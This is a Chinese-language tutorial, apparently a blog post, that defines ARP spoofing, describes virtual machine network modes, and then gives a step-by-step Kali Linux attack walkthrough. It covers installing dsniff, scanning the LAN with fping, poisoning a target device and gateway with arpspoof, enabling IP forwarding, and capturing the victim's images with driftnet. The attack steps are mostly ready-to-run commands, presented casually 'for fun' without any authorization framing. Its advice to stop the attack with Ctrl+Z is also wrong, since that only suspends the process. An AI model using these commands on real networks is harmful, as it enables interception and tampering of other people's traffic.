目录
一、什么是ARP欺骗
ARP欺骗(ARP spoofing),又称ARP毒化(ARP poisoning,网络上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定计算机或所有计算机无法正常连线。
二、虚拟机网络连接的3种模式
桥接模式:相当于在物理主机与虚拟机网卡之间架设了一座桥梁,从而可以通过物理主机的网卡访问外网。
NAT 模式:让 VM 虚拟机的网络服务发挥路由器的作用,使得通过虚拟机软件模拟的主机可以通过物理主机访问外网,在真机中 NAT 虚拟机网卡对应的物理网卡是VMnet8
仅主机模式:仅让虚拟机内的主机与物理主机通信,不能访问外网,在真机中仅主机模式模拟网卡对应的物理网卡是 VMnet1
三、实现ARP欺骗
1.ARP欺骗需要用到dsniff数据包
(arpspoof 是 dsniff 的一个附属工具,所以我们需要安装的是 dsniff),安装命令如下:
apt-get install dsniff
2.通过以下命令确定你的网卡名称和IP地址:
ifconfig
3.嗅探你所在WLAN下所有设备的IP地址,命令如下:
fping -g 本机IP地址/24
PS:例如我的IP是192.168.1.26,命令就是
fping -g 192.168.1.26/24
找到目标IP(Windows如果启动防火墙找不到)。
4.使用root权限使用以下命令攻击
(sudo su 启动root权限)
arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址
PS:网卡名称的查看上文已经提过,我以我的网卡为例,名称是
eth0
,攻击目标就是我的手机,IP是192.168.1.25
,手机的网关就是192.168.1.1(就是IP的最后一位改为1),于是我的攻击命令就是:arpspoof -i eth0 -t 192.168.1.25 192.168.1.1
最后手机虽然可以上网,但网速很慢,这就说明我们的ARP欺骗成功了。
如果你想停止攻击,就按下
Ctrl+Z
,攻击就停止了。
四、设置转发
1. vim /etc/sysctl.conf 配置文件,将net.ipv4.ip_forward
配置项取消掉“#
”注释符号,并将其值由 0 改为 1 即可开启端口转发.
2.在kali的root模式下输入
echo 1 >> /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
1
五、driftnet图片截取
driftnet是一款简单而使用的图片捕获工具,可以很方便的在网络数据包中抓取图片,其使用语法: driftnet [options] [filter code]
。
主要参数:
-b 捕获到新的图片时发声
-d 指定保存图片的路径
-x 指定保存图片的前缀名
-i 选择监听接口
-f 读取一个指定pcap数据包中的图片
-a 后台模式:
-m 指定保存图片数的数目
PS:接着在 Kali 终端重新执行 arpspoof 命令(注意网关IP和主机IP顺序此时需要对换一下
arpspoof -i eth0 -t 192.168.1.1(网关IP) 192.168.1.25(目标IP)
arpspoof -i eth0 -t 192.168.1.1 192.168.1.25
打开另外一个终端并执行 driftnet -i eth0
命令,即可获取到目标主机的图片。
注:像一些https://开头的网站基本上获取不了,即使获取到了也比较慢,没有参考价值,仅供娱乐)